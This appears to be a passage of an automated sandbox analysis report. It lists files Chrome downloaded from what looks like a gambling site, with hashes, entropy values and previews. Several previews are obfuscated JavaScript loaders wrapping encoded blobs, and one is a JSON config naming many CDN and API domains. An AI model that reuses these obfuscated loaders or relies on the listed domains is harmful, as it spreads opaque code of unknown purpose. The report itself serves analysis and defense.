                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 814 x 101, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13310
                                                                                                                                                          Entropy (8bit):7.971522442627064
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:E1KpSMF41AprsMtlMKzqaNdhUpTcDx45d6IQ82v:EwpNu1ARca3hUpTIx45kISv
                                                                                                                                                          MD5:673B130AD21275EAA8CCEE3A407B1363
                                                                                                                                                          SHA1:ABBE1E6466DC438959FD8B5CDF9664080F30C2FE
                                                                                                                                                          SHA-256:B9B6AB59F95AE2D92FB62B0BB7986949EB670EE70DFACE162E38F3B25CD2CABA
                                                                                                                                                          SHA-512:E34BDC7A9FF1F9351320B9D493BD281CF3CEB7891E59D9A0B5DD74E11EAFA9DF9B40A88FD36989C1D0E907BA1A5514B7A5BB0939B4D114ECA92DF55518B82C75
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/footer/footer_logo.png
                                                                                                                                                          Preview:.PNG........IHDR.......e.......G.....PLTEGpL...........................................uuu........~~~.............T....................9g]aaa....I=...........{...H.....N.kkkvvv.P..I.......Z.x.O.,]RGrha.~.THRys.......T...........K....r..j......N.....O..S.n....+.N..F...L........{s.R........W..m.......u.O..mp..(..}..........2y.M....._..H..S.-..........-......s.*.O................|.WWWlll..7.E|.@3.......P............................................001CCC...:::....$..)../.....6'($......MLL.|..p..........hgg....]..............ttt............................___dcc.H....~||...........m.......[Z[......X..p....9....~..^}..Wa...18"...r.........s}.X..{T...u....>36... ..SMG.....p.2i.p....\..5....0L.l......e..}.0[n.G]..,&.. >v..f-)....n..e.Mv..x..:..G..}M6e.+7.WV.....M.*.....e).6.....ttRNS..- ...@....0;``..J..rP.p.$Wb.n.=..z.3....Y...+L......9.k...... K..V...k..M..@....a...w..V.S........m......;>... .IDATx..}L.y.....v...B.../...........<.a....\r....qf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 646 x 1096, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):325680
                                                                                                                                                          Entropy (8bit):7.985358831590651
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:nD521jGhgFBg89jNfqjm/o04QAyVQrJofYZl39abmE2wgik:nsKgFBhjlqjd7QArSf29Ym5ik
                                                                                                                                                          MD5:A8CB3A8609C3512F673BA85D992DF3F7
                                                                                                                                                          SHA1:BEAB059309CE123C8866CFD5CFB5E2B4BF235F87
                                                                                                                                                          SHA-256:90608F12A13907059CBDAEAB11F25D9BD512A1449C5CF8145116279CE7BDC5EC
                                                                                                                                                          SHA-512:288E94B9CDAC17A4E3FAEC718A104CA83779AAD52FF51A4B9832D92A9A3AFF3E72A6D51D2C8B76BA1B24A56B8C2B620F5B3CE2542766126D772C4A1F039FE329
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/app/03.png
                                                                                                                                                          Preview:.PNG........IHDR.......H........... .IDATx^.}..$E.....>..9..j..`......d..S....uEp]QD<..\.k].........}..+.x.;....s..=.=}UU...~/"2...:...g.g*..+.*32.E...5.y.....s.c.=.qmw..8.6..O.6....m.e..D-BP...%I.$(CR...-..$K..D$L'e...............a...I)eC.."9!.5...n.~.....?....H..@.d..,..?.Of=?5.........l...Z.K..".BO.\.....'.@Y...HD>.1IRzRP..yR..).%...).~...BNIa=@A0.G..t.=..X,..-. *..YOO..&.f...}.......G<..b....m.d.%.\...|>..j.f}[....".X..h%.k....e....h.$.......B..ZRR..D..,...l.fftiC.U.[.s........4...]G.=..=T......R.S.5..W.L%.o.].....J.~i.1E..r..CR._3...............%...)!.+.._........2....B.}".y...x.TQtu.r}.?\(........*../..._.}...w..7)...&-fE..md....V.qN.DKl)Nj.d:].;-..vZ.}..{... .6Y.a.....H#....3..X...@...f...B....z.2....b.....(0...5<itN.#....G.y....a....'P.G...$0J>o~.....K{.i.e......@.....&....-/...RV. ..jD.P...I...D....B3($.......8.....=.e...| :L...w...}..MMb...y......4.%~...~.{..e.A..n..ky....3.K..R.$....S..t.A..i.*...&0..Niw5z......~....>O.V...L.`t.4.U.i.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4480
                                                                                                                                                          Entropy (8bit):5.485308833952035
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:2fdAibazoJgoFmMxCW2XB477mLz1+kLAbp:VTzygowMxCMI4N
                                                                                                                                                          MD5:4D84C725C3AF25EAAC09382DDCCB066A
                                                                                                                                                          SHA1:52991B7D603B70B12F378BB3C0C909C40884CCBF
                                                                                                                                                          SHA-256:A12EE8C9873A2D50DD7B91475490FCB5F60D3E8E262D31BDBD5EAE7BFA9092A4
                                                                                                                                                          SHA-512:1E5B61FF5875C2A9ED82A142425F55CAE47C009E943AA608A625EAF4321241D519D0F4475C0F60A08749F1ECF97C77DE5DE7BCBE6CB4040D6DBF8100128D395B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/bwin1768/plugin/js/myAnimate.js
                                                                                                                                                          Preview:/**....jQuery.. jQuery-animate.js ................class...class........ made by .. in 2018.10.29.. .....$('yourAnimateElement').myAnimate({ animateClass: 'demo'});.. ..... 1.ifIE() ..............IE.......... 2.ifWinWidth() ............................................ 3.bindEvent.. .window..scroll.......................... 4.mainAnimation() ......... 5.destructor() ............scroll......... */..(function ($) {.. function MyAnimate(el, opts) {.. this.init(el, opts);.. }.. MyAnimate.OPTS = {.. animateClass: 'demo', //..class .. .......... opacity: 1,
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3468), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3468
                                                                                                                                                          Entropy (8bit):5.915282977533667
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Vfm2C8Biv6f5cWWvasq0ckQvvOMN5Xikyz72vfT0uR:VFl8v6f5cksq0cJvv5XSL/23AC
                                                                                                                                                          MD5:05BDE0EE825B9E3F950E5258951D93F2
                                                                                                                                                          SHA1:BF04E455DB94F13E8A243F0EA65037D52DF51710
                                                                                                                                                          SHA-256:C0E0E4CA826CF9D52875B54C5B83ED63E540FA32901A90F8B8E1BF5B5E888965
                                                                                                                                                          SHA-512:626F49C2DBF0FDD7617A5482EDE738B72F15CA267267A4E1F4F7CD6B3279DEC81863B02E7603570CD52AAEB80738B10AAE4B62A6EC2AED88642A9416CC85B183
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/normalCaptcha.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgFZCBdAGgG8BRAS0PwC4AzAVzRgBcb1MOyQyUAJQUARCyQgABEg4AnGp1EBuAPJgAViE4A6ACYgmNNCAAKclBBByOAT0wDRAfScgkAWRR6WAGxCjKADcoHxYQBgBCAAYAXyFlYLkZAF4oTFEAET0ADmBRITIUVJ00TCQCtFT0qJgIJnyyGirRADkATQAPVQaYZoyWAHoAJgafZMwUTCFMChiydS1OTBodAFsoCABxEA4Oa3KcUTQUOXWfAGENjhgACyhREiECyenZ+c1tDmW1jfcWDigXHQBwokg4LROZ0uEGudwYMB07jilDkhlRSBuzDYnG4pREiSkHGSHBuNCQyhJZJ0HBQLFuAGp6WRKUgdGSADIoKB6YwAc2S0TIYIAKjRViBaV9WOwgXiKKiOCw5GhCWykJzuXyBbg5rgQPghHM9CgAMosMCrGgcLEy3FTeU7JUqlk6GBeEDE0mst0GVkaFDGdINND6QxQXwcHQAVS4PjVACEfFA0HBeF7Xe6hAB+EMGJjhnyRmM0OM0qCydKAaajABzxgFNFQAxWYBB6MAgB75BgDAA6egoABYYgNqW4vi6fSBs2mqcdTiFobCoK6Qj4wLBUyP3cz03AQLYCoEA3pCemwRDpxcrrc0qCbihgJEdU8GLmwxHo7HqVyK6Im83AKP6gG8MwB6M0AbbVAFl5QAHU0AdW18iNFBzh8FBJBtHEeBEF1j0hGdzzuGYMRvO9kRdKcoSw+cYGTGA/EuHwlxXKY5jBWcLwAaW3JDZV4VDN23Yk5hMDprWlZDSg4fEoCSD1IwBOReR2ZQaCYBwdGCUIQB0Pw0F5ElkmSVT1g6dkQA0kkhCYE5MAJKBkmNGAWHFNBIxkjgqD8OyOHjWwAEk9HSPYfAAdTkDZ8h0RznJAVykHc4UoF5FooHFdJjAgf4GiQZIomUJAAB553UzSbkyxkhHkzAoGwJAS
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2164), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2164
                                                                                                                                                          Entropy (8bit):5.930686869403833
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VftH0MNqZWMHdAOZEr3OGtIWCYyd+Cup1UUL9aROT++DVOH81z1Nazl:VfpQRdAYQbtIpZYCozwRXc791kR
                                                                                                                                                          MD5:F6EE3B5CBB435BC3AFC6886E32D80D34
                                                                                                                                                          SHA1:ED90E6EC7483E5264FA214E5CDBB5E0A53B747F2
                                                                                                                                                          SHA-256:F77B340A85EB74CA87A6210B27E27A462DAF403EA58998D293DEFDF434090F25
                                                                                                                                                          SHA-512:4ACE1B1394D658B7CE4DCD2A2DE6B572659C83DF72D92BA12C6B7E73BB0A50ACC52F7226E0A8FFCB4638C4E578ACF575A7EC43BC9730A82E4DFD25AA8766F57E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/analysis.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtArARgGYBdAGgG8AhAOQBEAWALgDMBXNGAFwEt1MB9UiFKcAlOQBErJCAAESTgCduXCQG4A8mABWILgDoAJiGbc0IAAqKUEEIs4BPTMIn9+IJAFkUh1gBsQCQoANyg/VhBGAEIABgBfUTVOTAkoAGoATg0JRNDFWRgAXmSJAFE0/AAlHNIoQvJFEDRjRRZ2Ll40THE82X5igAtuJH0AEhhGqE4QUoCAWybONUbOVkUuziGR/hk/Zn1+GAAfI/5RFMNuYJy40gUplUqmloAxNCRGbGJbxWKUgDUAKoAegAHDlMDB9FBaqQovhSGh/H5EcjUX4/IkQEYTFB/JxCop9CAAB4QFD2JC3MoVaptDg8PhzHz+YRuUCQWBwdxkimcJBuUjs8DQeD8RoAR1Y3EabnEUhk8iUKk46l6bgA6qVKBYAIIAYQA0vwAJKeCwaSoAFVKtH4ng0tEBABlSvwYm59RpPG5CsLOWLJdLZfwUjEYBBmDVNdq9UbTebLTa7Q6na7+Ph+H4fFAkANff7RdygzKQG4Up56MwXtH+FqdQbjWaLdbbfbHS63Zns4Zc/m3MZmHi/ATC1zxSApaW3PoujGG/Hm0m26nOxmszm83K1GOxaTyZSZ3VyAtNj4PuRs1BDAgAMr0jp8HpQfL9edxpuJ1spjvpj38L0fX4HEh3xfRAR4Px9AAcxATgAAkUAUE00GYFBumhNAwgcHgYCQZA1G4ZhMCiM4VjWNBZE2YZiRJPRbwmbgIGSXIX1kEBCkMFAYFYBY0E4GC4NmEA+P5SgHCtKBoOoKAFhSAZODmPwcmwGIyAJLieNE/QJhAKYZnmRYUiQRjmJyJJ9CQRQikEATHFsQoJGmElOGBbQoFCEzlDMkRoSQBwOEKWJfPQK9DEGGjSXo0zOCEaEIFsZp9SGPxDEwMRbiimAGO8zgH0ZSispypiWPIdUYBQOZmTQUYIO4PxR
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (760), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):760
                                                                                                                                                          Entropy (8bit):5.710786358990766
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWvnTeh+TJzRicmXZStxj9Xz9cudnPmvRoOBCXoI+huRluN6rL3kSjq31JhWkG:VGaMficcMxj9Xz9c6nPaTBmMhuGNqLUg
                                                                                                                                                          MD5:1981D35BBD195A80CB7E031D80873C13
                                                                                                                                                          SHA1:382F0AB8C43D027A4F99933929022231461863D8
                                                                                                                                                          SHA-256:B98599E45C89EA6DEC465E44CD5DE8BA09EB0382DEEFF76B6D450D1A49CD62DC
                                                                                                                                                          SHA-512:E7968FCCD69A15A659B96B0A2FE5507C469FA5C2E93D889C01594E2EB1C1132E153761CD7B3F514A8380BDCF95BA4FAEBD974FD9AA6B3E5FB8AE83EB27411FA7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/iconSvg.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQMxRAARw4+WcNo+NJrHigeSNGHcezckHzSYzYoAJ5o6ji40hgUKogObZWe+7QAOWrIzm5+QUksx4HEUaEoAGJeg1KABqHgACz4SH0vQGQyQN1uUHKszQxkU7C4vAEaEwkiKsh4pQRSP0ABIYLMtiAAKKBGpoYQgamI5GuGT+Nj6VwwAA+op4aiBILQshAmDqwXIMEGwxYlH8KB4PAavVksJpyNRqoxpGw8sozVaFAUWxUaLVlpauvewRV6O6G2ZLEN+i92yx2sUIzYKBg0igYEC6rO/hkwUoUGUUAaiMMxjB6qUEUoNzNFukQQoWyUI0oAA9/GY4Cx4bM2Kxfb0vjUbuJiO3xLdbfwYAAlEB4uwAMTQXWwxDihSTsj4pSQCoAagBVAD0AA5KOJMGhSFBSFFqKRfsTBDxJAvKHBlwBFJJb26UQxbFO0BoAFnXhHwUHXMQAnMEaABP4iQgEYJjnP4VJ8PoIDlhAKD2Ka153oSfwkkIIiSG2ahAA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2824), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2824
                                                                                                                                                          Entropy (8bit):5.906897077849898
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VBSRQQ35LOFKZzJa3UJ5sIVx4fA0ubXZUM8omUOQKE2oKllzrvsUN7FmpVQaE0M5:VG5aFKZqUJ5jGfCXZUtl9QKhoKllzrEw
                                                                                                                                                          MD5:21B06174DA38CC2FA3C816031D10FC45
                                                                                                                                                          SHA1:1DBC519CBC07FC0A5274AB1415EAF93B64094910
                                                                                                                                                          SHA-256:D25382FB5C5FAD474EE3214F162EA36BF7F2A212ED6A9E1F07970D9BE8310B41
                                                                                                                                                          SHA-512:E6D5DD8E88B8B0D8C59ACEC0E2E590DF6F6B126D9DECBCFADE3397C76F0583FE810EB1A96AA173CBC61605B2C160948A4457E6EE06D519244196D095DB6F78CF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/headerTip.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnARlwF0AaAbwAkBWCANQC4AzAVzRgBcBLdTdkkAJRkAviQCyuMQEEmrDtzS9+JTkIBEzJCAAESdgCdOHNQG4A8mABWIDgDoAJiEac0IAAr6UEEPvYBPTBASNQB9EJAkMRR7ZgAbEDVyADcoWOYQegBCAAZhARMU/V0AXk5MNWyYCEY1ARI0YrI0KABbDLUuCCQAGU49RPsodihZNi4eIX0QdmZ9NDIYezQ3IYALeiQHJyg49lsAYXQ9KDQ9xbQKFD0VFoBzAFUAJW6NrcYd2L3DtGPT23PLnoANRqAD0nBaUFuIAAtBAYKCUOxVj5QWogcAXPYUMBbABlADSAEkAHIgtEkTo9PrsegiSkQnz0NBxWIke54gCiXDa9DUiQhtwAQlAtPRsGpYidbiEIAAvRJqRhS25qUgwFCsdhM7IkDVanwAFUZ+mZrOEojayOiSDpgpWyNG8h4fEEZCmMzmalW7HYEDUxUDeyQzDAen0mF1ABYBAB+WnIvr/JYO1bkiFQ2HwtFAxObQUirTYEBEcno9iiLTsQ4G00sMYKJRuwraTjFMRrWzKlAoCNR/AAKg7yNs+hO2JamAEAiBMIATNkTHn/prTj5isv9Wv9EDOJTVkmt9r9AA+dgAMnPvAPmyP6/YdU3q+PAB4QJfr4fn+vBBaSC1v3sJ1xkUIRRBgKYhhAID62dUCyBbdgNxvfhikxNBsVxQlSRMMo1HwKRLFVARylsHMQHTDCQAAD1sSwkFqWxkRARRYJAwIhD2AASVxqPYY14EwNjG04pjOC6Xo9GKEBbBRKBHH0MSJJpAooCKNs9ipSS9mcT4fCEuR2NdSZplmNAOkZAMgyYvxvDyepimwIglyU6k9C7XtOVgVYDIbF11B5BJMms/xvEvPZYhpIltRaD8GgiqKYq7Tg9IjYT/PdUy5m0M4pTlOUN3+PK5QAHxK/kSBhfBguKEJbCxGiz
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/zbw?r=3965738312
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 54 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2340
                                                                                                                                                          Entropy (8bit):7.534024479840203
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:tzvn00tw0WSJ3vEpn15zo5dyl+KP+Jjns4gvoR/X:Z0060WIEv5zidSPyjs4CoR/X
                                                                                                                                                          MD5:B8FBA4CEB377D7A9F2C695C22B507163
                                                                                                                                                          SHA1:EA861D769806A41FBDADB46B977A56F79E7055A9
                                                                                                                                                          SHA-256:8064742DE9788C682C6AFB89CEFA9E1A0C37999E4BA886C998855A6D131B772C
                                                                                                                                                          SHA-512:66AE2290F706F0D9DFB74BDDDE0408426E1B1CA1843A87C250B49A3298B97F12C4FE241980B7F8B5EE2DBDBA28E40FC18F7C7E52C42871D1C5F005B53BAF6DF4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...6...6......Ej.....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D1E20A4521F511EE95B3B3F5D30ADB92" xmpMM:InstanceID="xmp.iid:D1E20A4421F511EE95B3B3F5D30ADB92" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3210364CF3A111E7AA4B8783A4658FA7" stRef:documentID="xmp.did:3210364DF3A111E7AA4B8783A4658FA7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..Zkl.U....i...ZhI.......T.IcH..P...V.........$.|'..&Z.!i $h..1........t..R.Y(e........:].1;3.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31962
                                                                                                                                                          Entropy (8bit):7.9895033338122285
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:XqIHQwrDkFXTSLrgbgmOqo5U/LnV6DZrutkYuxCBKgk05yu:XtHlfcSrCGALVMZrKkYukB
                                                                                                                                                          MD5:958A137A87E52D8F5EDB45368116F59B
                                                                                                                                                          SHA1:079D9FEEC663DF0314F0E9CB1CA0E4A5BDB9A0BB
                                                                                                                                                          SHA-256:6C0549E5CA87A1FA628C567A64A28BF0804453EC53AB5C97E8EC3ED77E5D0A51
                                                                                                                                                          SHA-512:BC8E285C552D7A877F3622FDEFCD528D2B7B829680C4121E15411CEE794A40C73C1966E8083E401BE9DD4E9B3C364FAE924057B43F213ABDB83DE43D5CD869CC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D3807F2493A511ECB2CB8AB4E21F74D7" xmpMM:InstanceID="xmp.iid:D3807F2393A511ECB2CB8AB4E21F74D7" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F730346459011EABC77EC84855C7F07" stRef:documentID="xmp.did:3F730347459011EABC77EC84855C7F07"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.....yHIDATx...|..?..)...z.%[.l..l..)...5@....R.yy..K!$..B..I..B..l.....XrW....]moS...E..6......3....{......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5572
                                                                                                                                                          Entropy (8bit):7.7725241814289
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:6SlwknmWpiiwjHeZI1gk/3ZfhtjedFq23DXPtpq+taP1R:6S2knFuU0gifh89PtL2R
                                                                                                                                                          MD5:17A5D794B2EF7BD6C328A116965C83B9
                                                                                                                                                          SHA1:2D49F13E28F8E2178721F13BD595BB221A267D51
                                                                                                                                                          SHA-256:A700BF25AF3135B2A527A81500A3D3B23137CEB47B1EA880C64FCF48A6887555
                                                                                                                                                          SHA-512:A92AC3CEC2FCED7667CACDE4592ECD0322CFB935A34FE5F3975E9AEE28A34BB1C428FCFE0898D07002ED1FE6F636920BC66A2F1538CF0CCFCCB41FDE4465C46E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/sport_ob.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmp:CreateDate="2023-03-16T10:35:39+08:00" xmp:ModifyDate="2023-09-22T14:09:50+08:00" xmp:MetadataDate="2023-09-22T14:09:50+08:00" xmpMM:InstanceID="xmp.iid:ad69b846-cb95-42f7-a126-58564483ed74" xmpMM:DocumentID="xmp.did:5085F9B0C3A411EDBDDBDD9832D2E5D0" xmpMM:OriginalDocumentID="xmp.did:5085F9
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (434), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):434
                                                                                                                                                          Entropy (8bit):4.276446137177361
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Lik4Xk4Lbk4L1ZTZmGk4LD9gIzLjp9gIzLz/Gg9gIzLPp:Li/X/Lb/LnVF/LD9lL19lL7Gg9lLPp
                                                                                                                                                          MD5:19E810547F1918B57C147ED44F6AA261
                                                                                                                                                          SHA1:DBD58ABFC0153B30EA2984040587920CC0CE89B5
                                                                                                                                                          SHA-256:7B63908F827B50DD226D1193CA39F9C03E48723E59ADAC3B2D94EFE99A36A40F
                                                                                                                                                          SHA-512:BD02054232A4EE1E115634C517B5602CC30F04BF7E661DE88D509B1A0A00A428A971B405626C4F4EE171FE44D6E1FEC8D5F34ACD3880348DDA45C82B844EDF65
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Preview:@import "../base.css";@import "../../../common/themes/base.css";@import "../../../common/themes/default/bootstrap/bootstrap.css";@import "../../../common/themes/default/bootstrap-dialog/bootstrap-dialog.css";@import "../../../common/themes/default/font-awesome/font-awesome.css";@import "../../../msites/themes/default/style.css";@import "../../../msites/themes/default/content.css";@import "../../../msites/themes/default/login.css";
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4196), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4196
                                                                                                                                                          Entropy (8bit):5.903348585445428
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VFeoNfoN0C8Lcn8s94xApuobxef5Q3IVnQnlips3i7ZSX+rEq7gRw:VFxo0Ckjs9xIf5Mgrps/X+4q7gRw
                                                                                                                                                          MD5:84E8520637936EF7178DF4244F44F2E6
                                                                                                                                                          SHA1:420F73A44180D76FB3A6440F92516B1DC80269C1
